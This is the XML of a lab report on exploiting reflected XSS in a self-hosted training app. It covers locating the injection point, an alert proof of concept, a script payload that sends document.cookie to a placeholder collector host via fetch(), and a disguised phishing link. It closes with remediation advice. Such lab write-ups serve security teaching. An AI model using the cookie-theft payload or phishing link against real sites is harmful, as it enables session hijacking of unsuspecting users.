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5BCAB" w14:textId="59EC8A97" w:rsidR="0030171F" w:rsidRDefault="00DB37FE" w:rsidP="00E66A0B">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Reflected XSS Exploitation Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D93C1D8" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="0030171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D3CA4" w14:paraId="2896510D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E3E5C" w14:textId="4A56E03C" w:rsidR="007D3CA4" w:rsidRDefault="007D3CA4" w:rsidP="007D3CA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B1FF8" w14:textId="01E53A43" w:rsidR="007D3CA4" w:rsidRDefault="007D3CA4" w:rsidP="007D3CA4">
            <w:r>
              <w:t xml:space="preserve"> KABA PETER NEBA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D3CA4" w14:paraId="70C2A1A4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01F0A" w14:textId="51F8D55C" w:rsidR="007D3CA4" w:rsidRDefault="007D3CA4" w:rsidP="007D3CA4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Target application / URL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388C4" w14:textId="777B925B" w:rsidR="007D3CA4" w:rsidRDefault="007D3CA4" w:rsidP="007D3CA4">
            <w:r>
              <w:t>local XSS Training Lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030171F" w14:paraId="09150E68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02726" w14:textId="2C68976E" w:rsidR="0030171F" w:rsidRDefault="007D3CA4">
            <w:r w:rsidRPr="007D3CA4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Authorization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AD909" w14:textId="1EB0F097" w:rsidR="0030171F" w:rsidRDefault="007D3CA4">
            <w:r>
              <w:t>Self-hosted lab, local testing only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E6F66D6" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>1. Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F2150A" w14:textId="33C745B0" w:rsidR="0030171F" w:rsidRDefault="00DB37FE" w:rsidP="007D3CA4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Identify and exploit a reflected XSS vulnerability in the search input field. Demonstrate JavaScript execution in the victim's browser, show how the flaw could be delivered via a phishing link, and capture a simulated session cookie to confirm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061E0F61" w14:textId="596097F7" w:rsidR="0030171F" w:rsidRDefault="005E3040">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00DB37FE">
        <w:t>. Steps Performed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5178A928" w14:textId="6480B02B" w:rsidR="00DB37FE" w:rsidRDefault="00DB37FE" w:rsidP="00DB37FE">
      <w:pPr>
        <w:spacing w:before="320" w:after="100"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t>Step 1: Set up the environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C9A09F" w14:textId="4726072C" w:rsidR="00DB37FE" w:rsidRDefault="00DB37FE" w:rsidP="00DB37FE">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Install</w:t>
      </w:r>
      <w:r w:rsidR="00B033BD">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dependencies and start the vulnerable target app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B75638C" w14:textId="0C6FB322" w:rsidR="00DB37FE" w:rsidRDefault="005D362D" w:rsidP="005D362D">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="202C900E" wp14:editId="04ECD338">
            <wp:extent cx="5762625" cy="18122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20" cy="181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C1B2" w14:textId="42E4FA8A" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00845318">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>: Locate the injection point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3153B21E" w14:textId="6295EDCC" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Identif</w:t>
      </w:r>
      <w:r w:rsidR="00845318">
        <w:t>ied</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the input field o</w:t>
      </w:r>
      <w:r w:rsidR="00845318">
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">URL parameter </w:t>
      </w:r>
      <w:r w:rsidR="00845318">
        <w:t>and searched a unique string and confirmed it appears unmodified in the response HTML.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr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0"/>
      </w:tblGrid>
      <w:tr w:rsidR="0030171F" w14:paraId="0792E5C3" w14:textId="77777777" w:rsidTr="00847747">
        <w:trPr>
          <w:trHeight w:val="2256"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="937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D3DB5B" w14:textId="5F37E2D0" w:rsidR="0030171F" w:rsidRDefault="005D362D">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E052611" wp14:editId="4092B481">
                  <wp:extent cx="5762625" cy="1309370"/>
                  <wp:effectExtent l="0" t="0" r="952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0656" cy="1315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852A0E" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>Figure 1: Unique test string reflected in the page response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E945374" w14:textId="77777777" w:rsidR="005D362D" w:rsidRDefault="005D362D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74AB281C" w14:textId="40797A73" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00845318">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>: Confirm</w:t>
      </w:r>
      <w:r w:rsidR="00845318">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the vulnerability with a proof-of-concept payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652EAFE2" w14:textId="1BDD3F77" w:rsidR="0030171F" w:rsidRDefault="00847747">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="888888"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B1E6381" wp14:editId="753702DC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4895850" cy="2259965"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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7FE">
        <w:t>Submit</w:t>
      </w:r>
      <w:r w:rsidR="00845318">
        <w:t>ted</w:t>
      </w:r>
      <w:r w:rsidR="00DB37FE">
        <w:t xml:space="preserve"> a script payload in the vulnerable parameter and confirm it execut</w:t>
      </w:r>
      <w:r w:rsidR="00845318">
        <w:t>ion</w:t>
      </w:r>
      <w:r w:rsidR="00DB37FE">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DB37FE">
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DB37FE">
        <w:t xml:space="preserve"> an alert box) instead of being displayed as text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347DFBD4" w14:textId="2EBEEE07" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>Figure 2: Alert box confirming script execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6032C3F6" w14:textId="7EB4E0FB" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00845318">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>: Identify the injection context</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="134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66B9" w14:paraId="4E3A5A37" w14:textId="77777777" w:rsidTr="00BD66B9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6D3295" w14:textId="77777777" w:rsidR="00BD66B9" w:rsidRDefault="00BD66B9" w:rsidP="00BD66B9">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FA3D2E3" wp14:editId="3ADE1F50">
                  <wp:extent cx="2971821" cy="30194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19" cy="302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178" w14:paraId="77D418F8" w14:textId="77777777" w:rsidTr="00BD66B9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78A80E" w14:textId="77777777" w:rsidR="00AF5178" w:rsidRDefault="00AF5178" w:rsidP="00BD66B9">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1694AD4E" w14:textId="3A774496" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Inspect</w:t>
      </w:r>
      <w:r w:rsidR="00845318">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the page source to determine whether the reflection lands in the HTML body, an HTML attribute, a JavaScript string, or a URL/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> context, and adjust the payload shape accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA4682F" w14:textId="7443A12B" w:rsidR="00AF5178" w:rsidRDefault="00DB37FE" w:rsidP="00845318">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>Figure 3: View-source showing the injection contex</w:t>
      </w:r>
      <w:r w:rsidR="00845318">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB14A32" w14:textId="77777777" w:rsidR="00AF5178" w:rsidRDefault="00AF5178">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0336C27B" w14:textId="77777777" w:rsidR="00AF5178" w:rsidRDefault="00AF5178">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4752EF4D" w14:textId="77777777" w:rsidR="00AF5178" w:rsidRDefault="00AF5178">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE376EA" w14:textId="77777777" w:rsidR="00AF5178" w:rsidRDefault="00AF5178">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2724C246" w14:textId="77777777" w:rsidR="00AF5178" w:rsidRDefault="00AF5178">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026A8598" w14:textId="77777777" w:rsidR="00AF5178" w:rsidRDefault="00AF5178">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E734EEC" w14:textId="77777777" w:rsidR="00AF5178" w:rsidRDefault="00AF5178">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A696EC" w14:textId="77777777" w:rsidR="00845318" w:rsidRDefault="00845318">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D7DC690" w14:textId="77777777" w:rsidR="00845318" w:rsidRDefault="00845318">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F80D9B7" w14:textId="77777777" w:rsidR="00845318" w:rsidRDefault="00845318">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D741A5B" w14:textId="77777777" w:rsidR="00845318" w:rsidRDefault="00845318">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D157BCF" w14:textId="77777777" w:rsidR="00845318" w:rsidRDefault="00845318">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE1FA32" w14:textId="6B480B81" w:rsidR="00845318" w:rsidRDefault="00845318">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45EE4EAC" w14:textId="628DA1DD" w:rsidR="00845318" w:rsidRDefault="00845318">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E878169" w14:textId="77777777" w:rsidR="00E66A0B" w:rsidRDefault="00E66A0B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="530CD595" w14:textId="5C3B839F" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Escalate to session cookie capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A9EDB" w14:textId="57F42ED3" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Replace</w:t>
      </w:r>
      <w:r w:rsidR="00546468">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the alert payload with one that reads </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and sen</w:t>
      </w:r>
      <w:r w:rsidR="00546468">
        <w:t xml:space="preserve">t </w:t>
      </w:r>
      <w:r>
        <w:t>it to a</w:t>
      </w:r>
      <w:r w:rsidR="00546468">
        <w:t xml:space="preserve"> co</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">llector </w:t>
      </w:r>
      <w:r w:rsidR="00546468">
        <w:t>which I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> control. Confirm</w:t>
      </w:r>
      <w:r w:rsidR="00546468">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the value arrives at the collector.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9"/>
      </w:tblGrid>
      <w:tr w:rsidR="0030171F" w14:paraId="6C4F58F6" w14:textId="77777777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CF659" w14:textId="400328BE" w:rsidR="0030171F" w:rsidRDefault="00AF5178">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33327AE6" wp14:editId="3448B2C8">
                  <wp:extent cx="5865485" cy="2286000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843" cy="229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47747">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00DB37FE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4863966A" w14:textId="4FA86180" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F8E316F" w14:textId="2DD4915F" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AF5178">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ED9A8AD" wp14:editId="0F28D369">
                  <wp:extent cx="5873393" cy="233362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355" cy="2342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B2964" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="303FD8C4" w14:textId="24D2934E" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C6B9F5D" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67CD6330" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D630F50" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B14BA99" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>Figure 4: Collector log showing the captured cookie value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25474258" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Step 5: Build the phishing delivery link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C8FDBD" w14:textId="4495AC70" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Construct</w:t>
      </w:r>
      <w:r w:rsidR="00546468">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a URL containing the payload as a query parameter and (optionally) shorten/disguise it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1D45C2" w14:textId="77777777" w:rsidR="00845318" w:rsidRDefault="00845318">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA04C0D" w14:textId="77777777" w:rsidR="00845318" w:rsidRDefault="00845318">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF3A65A" w14:textId="5A2003A6" w:rsidR="0030171F" w:rsidRDefault="005E3040">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00DB37FE">
        <w:t>. Payload(s)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171F" w14:paraId="4EBE5D0F" w14:textId="77777777"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41B850" w14:textId="3BE10158" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>Proof of concept:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1848CB4D" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;script&gt;alert(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document.domain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)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BAC14BA" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="0030171F"/>
          <w:p w14:paraId="53A3EF8C" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>Cookie exfiltration:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5329AEBE" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;script&gt;fetch('http://&lt;collector-host&gt;/collector?data='+</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0121838C" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="0030171F"/>
          <w:p w14:paraId="7DC04123" w14:textId="43F02F8B" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>Phishing lin</w:t>
            </w:r>
            <w:r w:rsidR="00235626">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>k</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="538FCD28" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">  https://target-site.example/search?q=&lt;script&gt;...&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04927B1F" w14:textId="361DAEB2" w:rsidR="0030171F" w:rsidRDefault="005E3040">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00DB37FE">
        <w:t>. Root Cause Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028A00A0" w14:textId="532B5AD2" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application inserts user-supplied input into the HTML response without output encoding, so the browser cannot distinguish attacker-supplied markup from legitimate page content. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03469B9F" w14:textId="105FA450" w:rsidR="0030171F" w:rsidRDefault="005E3040">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00DB37FE">
        <w:t>. Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CCDDA8" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Apply context-aware output encoding at the point the value is rendered (HTML entity, attribute, JS-string, or URL encoding as appropriate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C605E07" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use the templating framework's default </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>autoescaping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rather than disabling it for this field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5804093C" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set session cookies as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, Secure, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to limit the value of any successful XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE322B5" w14:textId="77777777" w:rsidR="0030171F" w:rsidRDefault="00DB37FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Add a Content-Security-Policy restricting script sources as defense in depth.</w:t>
      </w:r>
    </w:p>
